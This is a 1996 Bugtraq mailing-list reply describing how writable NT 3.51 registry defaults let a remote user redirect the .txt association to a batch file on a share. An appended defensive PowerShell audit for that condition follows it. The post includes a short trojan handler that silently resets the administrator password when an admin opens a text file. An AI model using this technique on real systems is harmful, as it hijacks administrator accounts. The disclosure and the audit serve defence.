Bugtraq mailing list archives
Re: NT security et al (Dangers of NetBIOS/NBT?)
From: itudps () lux levels unisa edu au (Dan Shearer)
Date: Sat, 28 Sep 1996 14:05:28 +0930
On Fri, 27 Sep 1996, Jacob Langseth wrote:
here's some more: ppl can read portions of the registry remotely (via regedt32.exe).
By default they can _write_ to it too, at least under 3.51 the default permissions gave Everyone write access to quite a few things. The canonical example was (is) the key that determines the association between an application and its extension in file manager. That can be changed by an unprivileged, even unknown user with access to regedt32 on a connected network. Should the .txt entry be changed to point to:

    \\SomeNTorUnixWorkstation\UnprotectedShare\bogus.cmd

where bogus.cmd contains:

    net user administrator xxxxx /y
    notepad %1 %2 %2 %3 %4 %5

all someone with admin privilege at the console has to do is double-click on a text file and the admin password is changed.

Of course this is a pretty basic example because the admin would (hopefully) be suspicious on seeing a dos box pop up. But it is trivial to write a win32 app that both launches notepad and does some malicious trapdoor stuff with the admin privilege it has been given.

--
Dan Shearer                     email: Dan.Shearer () UniSA edu au
Information Technology Unit     Phone: +61 8 302 3479
University of South Australia   Fax : +61 8 302 3385
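
An audit for the two conditions the message describes, added here as an example and not part of the original post: file-association keys that broad groups can write to, and handlers that run from a network share. It assumes a current Windows host with PowerShell 5.1 or later and the HKLM\SOFTWARE\Classes layout; the extension list and the function name Get-BroadWriteAce are illustrative.

```powershell
# Added example: audit file-association keys (assumed layout: HKLM\SOFTWARE\Classes).
$classes    = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes'
$extensions = '.txt', '.cmd', '.bat'                 # illustrative list, extend as needed
# Well-known SIDs: Everyone, Authenticated Users, BUILTIN\Users
$broadSids  = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'
# Rights that allow changing or replacing a handler, plus GENERIC_WRITE / GENERIC_ALL
$rights     = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
$writeMask  = [int]$rights -bor 0x50000000

function Get-BroadWriteAce {
    param([string]$KeyPath)
    # Resolve ACEs to SIDs so the check does not depend on localized group names
    $sidType = [System.Security.Principal.SecurityIdentifier]
    (Get-Acl -LiteralPath $KeyPath).GetAccessRules($true, $true, $sidType) |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $broadSids -contains $_.IdentityReference.Value -and
            (([int]$_.RegistryRights) -band $writeMask) -ne 0
        }
}

foreach ($ext in $extensions) {
    $extKey = "$classes\$ext"
    if (-not (Test-Path -LiteralPath $extKey)) { continue }
    $keys    = @($extKey)
    $command = $null
    # The extension key's default value names the ProgID that holds the open command
    $progId  = (Get-Item -LiteralPath $extKey).GetValue('')
    if ($progId) {
        $cmdKey = "$classes\$progId\shell\open\command"
        if (Test-Path -LiteralPath $cmdKey) {
            $keys   += $cmdKey
            $command = (Get-Item -LiteralPath $cmdKey).GetValue('')
        }
    }
    foreach ($k in $keys) {
        foreach ($ace in Get-BroadWriteAce -KeyPath $k) {
            [pscustomobject]@{ Extension = $ext; Finding = 'BroadWriteAccess'; Key = $k
                               Detail = "$($ace.IdentityReference.Value) $($ace.RegistryRights)" }
        }
    }
    # A handler that starts with \\ is loaded from a share, as in the bogus.cmd case
    if ($command -match '^\s*"?\\\\') {
        [pscustomobject]@{ Extension = $ext; Finding = 'HandlerOnNetworkShare'
                           Key = $cmdKey; Detail = $command }
    }
}
```

No output means none of the listed extensions matched either condition; per-user associations under HKCU are outside what this example checks.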